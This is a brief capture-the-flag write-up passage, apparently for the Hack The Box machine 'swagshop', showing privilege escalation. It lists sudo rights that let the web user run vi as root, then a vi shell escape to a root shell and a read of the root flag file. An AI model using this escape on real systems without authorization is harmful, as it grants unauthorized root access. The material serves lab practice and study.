3 privesc

sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*


sudo /usr/bin/vi /var/www/html/test
:!/bin/bash
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
   ___ ___
 /| |/|\| |\
/_| ยด |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!
  |___|.__|       https://hackthebox.store/password

                   PS: Use root flag as password!

Last updated